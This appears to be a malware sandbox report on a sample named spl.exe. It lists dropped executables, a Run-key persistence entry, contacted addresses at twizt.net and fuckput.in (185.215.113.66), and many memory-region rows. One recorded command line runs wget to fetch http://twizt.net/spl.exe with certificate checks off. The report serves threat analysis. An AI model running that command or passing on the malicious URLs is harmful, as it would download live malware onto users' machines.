Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\Users\user\Desktop\download\spl.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
 |
|
|
C:\Users\user\winsvc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\Desktop\cmdline.out
|
ASCII text, with CRLF line terminators
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\download\spl.exe
|
"C:\Users\user\Desktop\download\spl.exe"
|
|
|
|
C:\Users\user\winsvc.exe
|
C:\Users\user\winsvc.exe
|
|
|
|
C:\Users\user\winsvc.exe
|
"C:\Users\user\winsvc.exe"
|
|
|
|
C:\Users\user\winsvc.exe
|
"C:\Users\user\winsvc.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition
--user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://twizt.net/spl.exe" > cmdline.out
2>&1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\wget.exe
|
wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://twizt.net/spl.exe"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://twizt.net/spl.exe
|
|
||
|
http://twizt.net/lslut.exevd
|
unknown
|
|
|
|
http://twizt.net/lslut.exe6e
|
unknown
|
|
|
|
http://twizt.net/lslut.exewinsvc.exe
|
unknown
|
|
|
|
http://twizt.net/lslut.exe.X
|
unknown
|
|
|
|
http://twizt.net/InstalledH
|
unknown
|
|
|
|
http://twizt.net/InstalledopenMozilla/5.0
|
unknown
|
|
|
|
http://twizt.net/lslut.exe.e
|
unknown
|
|
|
|
http://twizt.net/lslut.exek
|
unknown
|
|
|
|
http://twizt.net/lslut.exe&
|
unknown
|
|
|
|
http://twizt.net/InstalledFd
|
unknown
|
|
|
|
http://twizt.net/spl.exe
|
185.215.113.66
|
|
|
|
http://twizt.net/Installed
|
185.215.113.66
|
|
|
|
http://twizt.net/lslut.exe
|
185.215.113.66
|
|
|
|
http://twizt.net/spl.exei?
|
unknown
|
||
|
http://twizt.net/lslut.exe0t~
|
unknown
|
||
|
http://twizt.net/spl.exek?
|
unknown
|
||
|
http://twizt.net/lslut.exewinsvc.exeb
|
unknown
|
||
|
http://twizt.net/Installed1
|
unknown
|
||
|
http://twizt.net/lslut.exewinsvc.exe#
|
unknown
|
||
|
http://twizt.net/lslut.exesc
|
unknown
|
||
|
http://fuckput.in/N
|
unknown
|
||
|
http://twizt.net/lslut.exex
|
unknown
|
||
|
http://twizt.net/lslut.exew
|
unknown
|
||
|
http://twizt.net/lslut.exeNe
|
unknown
|
||
|
http://twizt.net/lslut.exeeW
|
unknown
|
||
|
http://twizt.net/spl.exers
|
unknown
|
||
|
http://twizt.net/lslut.exewinsvc.exe3
|
unknown
|
||
|
http://twizt.net/lslut.exeF
|
unknown
|
||
|
http://twizt.net/lslut.exepW
|
unknown
|
||
|
http://twizt.net/spl.exentel64
|
unknown
|
||
|
http://twizt.net/lslut.exe%s:Zone.Identifier%userprofile%%s
|
unknown
|
||
|
http://twizt.net/lslut.exeSW
|
unknown
|
||
|
http://fuckput.in/
|
unknown
|
||
|
http://twizt.net/lslut.exeO
|
unknown
|
||
|
http://twizt.net/lslut.exeot
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
twizt.net
|
185.215.113.66
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.215.113.66
|
twizt.net
|
Portugal
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Windows Service
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
E70000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
B9E000
|
heap
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
DCF000
|
stack
|
page read and write
|
||
|
51C000
|
stack
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
A80000
|
heap
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
648000
|
heap
|
page read and write
|
||
|
453000
|
unkown
|
page readonly
|
||
|
1AB000
|
stack
|
page read and write
|
||
|
C08000
|
heap
|
page read and write
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
42C000
|
stack
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
93E000
|
stack
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
100E000
|
stack
|
page read and write
|
||
|
B9A000
|
heap
|
page read and write
|
||
|
895000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
BE1000
|
heap
|
page read and write
|
||
|
18E000
|
stack
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
8FA000
|
stack
|
page read and write
|
||
|
2F1C000
|
stack
|
page read and write
|
||
|
BFD000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
A8E000
|
heap
|
page read and write
|
||
|
55A000
|
stack
|
page read and write
|
||
|
E0E000
|
stack
|
page read and write
|
||
|
DFB000
|
stack
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
1C6000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
580000
|
heap
|
page read and write
|
||
|
AC000
|
stack
|
page read and write
|
||
|
EFE000
|
stack
|
page read and write
|
||
|
DF6000
|
stack
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
453000
|
unkown
|
page readonly
|
||
|
EBE000
|
stack
|
page read and write
|
||
|
B8E000
|
stack
|
page read and write
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
1195000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
2C1F000
|
stack
|
page read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
306E000
|
stack
|
page read and write
|
||
|
2E1F000
|
stack
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
451000
|
unkown
|
page execute read
|
||
|
1190000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
2C7F000
|
stack
|
page read and write
|
||
|
1A6000
|
stack
|
page read and write
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
2F5E000
|
stack
|
page read and write
|
||
|
A9E000
|
stack
|
page read and write
|
||
|
E4E000
|
stack
|
page read and write
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
B08000
|
heap
|
page read and write
|
||
|
B2E000
|
stack
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
410000
|
heap
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
1398000
|
heap
|
page read and write
|
||
|
AEE000
|
stack
|
page read and write
|
||
|
168F000
|
stack
|
page read and write
|
||
|
D7F000
|
stack
|
page read and write
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
2F2C000
|
stack
|
page read and write
|
||
|
5FE000
|
stack
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
C7F000
|
stack
|
page read and write
|
||
|
AD2000
|
heap
|
page read and write
|
||
|
556000
|
stack
|
page read and write
|
||
|
A08000
|
heap
|
page read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
A6F000
|
stack
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
83E000
|
stack
|
page read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
1750000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
8F6000
|
stack
|
page read and write
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
58E000
|
stack
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
1030000
|
heap
|
page read and write
|
||
|
DDD000
|
stack
|
page read and write
|
||
|
305E000
|
stack
|
page read and write
|
||
|
C12000
|
heap
|
page read and write
|
||
|
9CC000
|
stack
|
page read and write
|
||
|
2E2D000
|
stack
|
page read and write
|
||
|
FCF000
|
stack
|
page read and write
|
||
|
158F000
|
stack
|
page read and write
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
2D1F000
|
stack
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
CFC000
|
stack
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
A8A000
|
heap
|
page read and write
|
||
|
AA6000
|
heap
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
BB7000
|
heap
|
page read and write
|
||
|
A20000
|
heap
|
page read and write
|
||
|
52E000
|
stack
|
page read and write
|
||
|
ABF000
|
heap
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
455000
|
unkown
|
page readonly
|
||
|
F00000
|
heap
|
page read and write
|
||
|
451000
|
unkown
|
page execute read
|
||
|
83E000
|
stack
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
E05000
|
unkown
|
page readonly
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
E01000
|
unkown
|
page execute read
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
309E000
|
stack
|
page read and write
|
||
|
87E000
|
stack
|
page read and write
|
||
|
AF9000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
14E000
|
stack
|
page read and write
|
||
|
455000
|
unkown
|
page readonly
|
||
|
AA5000
|
heap
|
page read and write
|
There are 137 hidden memdumps, click here to show them.